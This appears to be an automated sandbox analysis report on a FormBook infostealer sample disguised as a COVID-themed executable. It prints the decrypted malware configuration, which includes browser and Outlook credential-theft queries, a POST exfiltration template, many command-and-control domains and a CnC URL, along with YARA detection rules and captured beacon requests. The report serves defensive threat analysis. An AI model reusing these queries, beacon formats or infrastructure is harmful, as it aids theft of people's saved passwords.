Loading ...

Play interactive tourEdit tour

Analysis Report Po-covid19 2372#w2..exe

Overview

General Information

Sample Name:Po-covid19 2372#w2..exe
Analysis ID:338985
MD5:bf53c9dc0d0f032033c318aceef906c6
SHA1:eeba1ef352c09979dfdfb4afdcdc5f41fe2a0119
SHA256:a1558391914f4235dfdcdddcdf0de915a800541a4271feb4aff34af82b83a935
Tags:COVID19exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Po-covid19 2372#w2..exe (PID: 5532 cmdline: 'C:\Users\user\Desktop\Po-covid19 2372#w2..exe' MD5: BF53C9DC0D0F032033C318ACEEF906C6)
    • Po-covid19 2372#w2..exe (PID: 5404 cmdline: {path} MD5: BF53C9DC0D0F032033C318ACEEF906C6)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msiexec.exe (PID: 6748 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
          • cmd.exe (PID: 7092 cmdline: /c del 'C:\Users\user\Desktop\Po-covid19 2372#w2..exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x8bc3", "KEY1_OFFSET 0x1d7db", "CONFIG SIZE : 0xd9", "CONFIG OFFSET 0x1d8dd", "URL SIZE : 28", "searching string pattern", "strings_offset 0x1c383", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xfd2db44c", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70b3", "0x9f715022", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121d2", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01541", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04", "0x50c2a508", "0x3e88e8bf", "0x4b6374a6", "0x72a93198", "0x85426977", "0xea193e11", "0xea653007", "0xe297c9c", "0x65399e87", "0x23609e75", "0xb92e8a5a", "0xabc89476", "0xd989572f", "0x4536ab86", "0x3476afc1", "0xaf24a63b", "0x393b9ac8", "0x414a3c70", "0x487e77f4", "0xbee1bdf6", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "kimberlyrutledge.com", "auctus.agency", "johnemotions.com", "guilt-brilliant.com", "wxshangdian.com", "theolivetreeonline.com", "stellarfranchisebrands.com", "every1no1.com", "hoangthanhgroup.com", "psm-gen.com", "kingdomwow.com", "digitalksr.com", "karynpolitoforlg.com", "youthdaycalgary.com", "libertyhandymanservicesllc.com", "breatheohio.com", "allenleather.com", "transformafter50.info", "hnhsylsb.com", "hmtradebd.com", "besrhodislandhomes.com", "zuwozo.com", "southernhighlandsnails.com", "kaaxg.com", "bauer-cobolt.com", "steelyourselfshop.net", "linksoflondoncharmscheap.com", "groundwork-pt.com", "beautifulangelicskin.com", "aduhelmfinancialsupport.com", "xn--carpinteratarifa-hsb.com", "thekingink.net", "ocotegrill.com", "gilbertdodge.com", "insuranceinquirer.com", "withagentcy.com", "deeparchivesvpn.com", "blamekd.com", "acsdealta.xyz", "dsxcj.com", "kimonoshihan.com", "bosquefamily.com", "5587sk.com", "integrative.life", "unitedjournal.info", "lynxdeck.com", "onlyfanyou.com", "aminomedicalscience.com", "rachenstern-technik.com", "thejewelrybox.net", "stopcolleges.com", "thesaltlifestyle.com", "tappesupportservices.com", "andrewgreenhomes.com", "meidiansc.com", "gobalexporter.com", "rvpji571m.xyz", "alwekalaaladabeya.com", "scientificimaginetics.com", "skaizenpharma.com", "balloonpost.club", "thefunnythingabout.com", "premium-vitality.com", "businesscalmcoaching.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.styrelseforum.com/p95n/\u0000"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18429:$sqlite3step: 68 34 1C 7B E1
    • 0x1853c:$sqlite3step: 68 34 1C 7B E1
    • 0x18458:$sqlite3text: 68 38 2A 90 C5
    • 0x1857d:$sqlite3text: 68 38 2A 90 C5
    • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
    00000003.00000002.297322370.0000000000FB0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000003.00000002.297322370.0000000000FB0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.Po-covid19 2372#w2..exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.Po-covid19 2372#w2..exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a707:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b70a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.Po-covid19 2372#w2..exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17629:$sqlite3step: 68 34 1C 7B E1
        • 0x1773c:$sqlite3step: 68 34 1C 7B E1
        • 0x17658:$sqlite3text: 68 38 2A 90 C5
        • 0x1777d:$sqlite3text: 68 38 2A 90 C5
        • 0x1766b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17793:$sqlite3blob: 68 53 D8 7F 8C
        3.2.Po-covid19 2372#w2..exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.2.Po-covid19 2372#w2..exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus / Scanner detection for submitted sampleShow sources
          Source: Po-covid19 2372#w2..exeAvira: detected
          Found malware configurationShow sources
          Source: 3.2.Po-covid19 2372#w2..exe.400000.0.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x8bc3", "KEY1_OFFSET 0x1d7db", "CONFIG SIZE : 0xd9", "CONFIG OFFSET 0x1d8dd", "URL SIZE : 28", "searching string pattern", "strings_offset 0x1c383", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xfd2db44c", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70b3", "0x9f715022", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121d2", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01541", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",
          Multi AV Scanner detection for submitted fileShow sources
          Source: Po-covid19 2372#w2..exeReversingLabs: Detection: 27%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.297322370.0000000000FB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.616862762.0000000000B70000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.298199420.00000000013B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.256080598.000000000406F000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.Po-covid19 2372#w2..exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.Po-covid19 2372#w2..exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: Po-covid19 2372#w2..exeJoe Sandbox ML: detected
          Source: 3.2.Po-covid19 2372#w2..exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Compliance:

          barindex
          Detected unpacking (overwrites its own PE header)Show sources
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeUnpacked PE file: 0.2.Po-covid19 2372#w2..exe.70000.0.unpack
          Source: Po-covid19 2372#w2..exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: Po-covid19 2372#w2..exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msiexec.pdb source: Po-covid19 2372#w2..exe, 00000003.00000002.298579388.0000000001410000.00000040.00000001.sdmp
          Source: Binary string: msiexec.pdbGCTL source: Po-covid19 2372#w2..exe, 00000003.00000002.298579388.0000000001410000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Po-covid19 2372#w2..exe, 00000003.00000002.299260110.000000000160F000.00000040.00000001.sdmp, msiexec.exe, 0000000E.00000002.618326850.0000000004560000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Po-covid19 2372#w2..exe, msiexec.exe
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 4x nop then pop esi
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 165.160.13.20:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 165.160.13.20:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 165.160.13.20:80
          Source: global trafficHTTP traffic detected: GET /p95n/?u6ihA=cjlpdRL8ZtfDvB1&oH5h=BBaWJPlPEO+nvtMqhmqrcRgDtKq1LKrnuc6I0tDI+4mn5icveD46W7DXUUudv5GhOCct HTTP/1.1Host: www.thesaltlifestyle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p95n/?oH5h=yIt3vHGcFY19i9LszRbGqv8br4EBNSz7kQseU3pL44UQdgKo/VZu2mbLhFyK51ONzUns&u6ihA=cjlpdRL8ZtfDvB1 HTTP/1.1Host: www.aduhelmfinancialsupport.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p95n/?u6ihA=cjlpdRL8ZtfDvB1&oH5h=gRhj5HMuZvR/Ec7o8oi+HxLziNFcY38IPUSKESyExHr5bx7zEB/jrV73UqEK091YdqI8 HTTP/1.1Host: www.scientificimaginetics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p95n/?oH5h=OkCbzDuuF1pG8/+FjCqUEbhCI/Ef9I/I5jzkOiKX/zkELnGsjuBbK/8sh3SawKW3Kze/&u6ihA=cjlpdRL8ZtfDvB1 HTTP/1.1Host: www.johnemotions.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
          Source: Joe Sandbox ViewASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK
          Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /p95n/?u6ihA=cjlpdRL8ZtfDvB1&oH5h=BBaWJPlPEO+nvtMqhmqrcRgDtKq1LKrnuc6I0tDI+4mn5icveD46W7DXUUudv5GhOCct HTTP/1.1Host: www.thesaltlifestyle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p95n/?oH5h=yIt3vHGcFY19i9LszRbGqv8br4EBNSz7kQseU3pL44UQdgKo/VZu2mbLhFyK51ONzUns&u6ihA=cjlpdRL8ZtfDvB1 HTTP/1.1Host: www.aduhelmfinancialsupport.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p95n/?u6ihA=cjlpdRL8ZtfDvB1&oH5h=gRhj5HMuZvR/Ec7o8oi+HxLziNFcY38IPUSKESyExHr5bx7zEB/jrV73UqEK091YdqI8 HTTP/1.1Host: www.scientificimaginetics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p95n/?oH5h=OkCbzDuuF1pG8/+FjCqUEbhCI/Ef9I/I5jzkOiKX/zkELnGsjuBbK/8sh3SawKW3Kze/&u6ihA=cjlpdRL8ZtfDvB1 HTTP/1.1Host: www.johnemotions.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.thesaltlifestyle.com
          Source: explorer.exe, 00000004.00000000.281618251.000000000F5C4000.00000004.00000001.sdmpString found in binary or memory: http://crl.;
          Source: explorer.exe, 00000004.00000000.281664878.000000000F5E5000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.225055826.000000000791B000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.226795444.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com-
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.227104715.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com.TTF
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.225390108.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/
          Source: explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.225055826.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.226977608.0000000007942000.00000004.00000001.sdmp, Po-covid19 2372#w2..exe, 00000000.00000003.226763972.0000000007942000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
